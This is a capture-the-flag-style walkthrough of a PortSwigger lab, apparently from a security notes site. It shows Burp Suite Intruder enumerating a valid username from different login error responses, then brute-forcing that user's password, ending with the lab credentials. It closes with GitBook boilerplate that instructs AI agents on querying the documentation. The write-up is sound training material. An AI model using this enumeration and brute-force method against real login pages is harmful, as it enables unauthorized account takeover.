> For the complete documentation index, see [llms.txt](https://repo.4pfsec.com/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://repo.4pfsec.com/portswigger-labs/authentication/username-enumeration-via-different-responses.md). # Username enumeration via different responses The target site has an account with a predictable username and password, which can be found in the following wordlists: {% file src="/files/i6sHt53O6AovpOQzHtgA" %} {% file src="/files/XFcrGLauFqq1PWEPhOGc" %} To solve the lab, enumerate a valid username, brute-force this user's password, then access their account page. ## Enumeration `Home Page` ![](/files/pOLdpydLIc6u2eDxcNRG) `Login Page` ![Login Form](/files/P2XFFhCc2WmlvBOkGR59) ![Login Form](/files/utlaoFZ33MfdUPACMHXY) ![Error Message](/files/Y6Fr5kzVBo1avdOrpPSA) Upon Inspection of the login page, we are able to get a detailed response regarding the entered information. ## Exploitation ### Username Enumeration Setup burp to intercept requests. ![](/files/yFruJgBockhJmVl8jCgc) Make a login request with random credentials and intercept it with burp. ![](/files/5MDxLIf181YfKi06p9WU) In the response of that request, we are able to see that the site returns `Invalid Username` ![](/files/KpWv2vr9RvOjoA9dyQZI) ![](/files/BFYOQWAWEQCvG5IHsbuM) Right-click on the `POST` request and send it to the intruder tab ![](/files/ia3ZCX2HBVVr5lLJ7NDM) Head over to the Intruder tab and clear all markings ![](/files/nAwJRLkRqVaJsD2q74Lz) ![](/files/XjeiTgjYGGkbtbiFctNx) Mark only the username field ![](/files/ifFc3HeyW9uJqKqIh7ok) ![](/files/U27td40LAM35nUpPgvmd) Head over to the payloads tab under Intruder and make sure the following options are set and paste the username list for enumeration. ```jsx Payload set: 1 Payload type: Simple List ``` ![](/files/plDgGy2iuP5YD44j0ujK) Once done, hit start attack. (ignore error, if any) ![](/files/E6SrVqlrKxbKUJLdL8OJ) ![](/files/TSPW4mwW5Cyr2N0bbvZ4) Once, attack is completed, sort the requests according to Length. When done so, one of the requests should have a longer length compared to the rest as shown below. ![](/files/JzM5ZMIZ3xSEN9D0bCag) Upon further inspection of that request, we are able to see a new error as such. This confirms that the username is indeed `application` ```jsx Incorrect password ``` ![](/files/pE4LdvbXnFxeqF9J1Gip) ### Password Enumeration Now repeat the process all over again but target the password field with the password list while keeping the username a constant. Right-click on the `POST` request and send it to the intruder tab ![](/files/6rBMA3f7ptKSfeH3fEBk) Setup the positions as such ![](/files/QEMZGNXD0YpGz2EzYpVE) Paste the password list where the username list was ![](/files/GNOEcbefzhCPkJ2uiWed) Start the attack ![](/files/Td94ECYgoZ9bXawrX9Ha) Once, attack is completed, sort the requests according to Length. When done so, one of the requests should have a longer length compared to the rest as shown below. The 302 status code indicates a redirect and looking at the `location` parameter in the response confirms that we have indeed got the right password. (`soccer`) ![](/files/Kz7Dji8VDS9E0xfY885G) Upon Logging in with the found credentials, we complete the lab. ```jsx application:soccer ``` ![](/files/DyXPeQHiBWh45wN38gvO) ![](/files/GgVZN47L7Cmb3vMTwG2h) ✅ --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter: ``` GET https://repo.4pfsec.com/portswigger-labs/authentication/username-enumeration-via-different-responses.md?ask=&goal= ``` `ask` is the immediate question: it should be specific, self-contained, and written in natural language. `goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.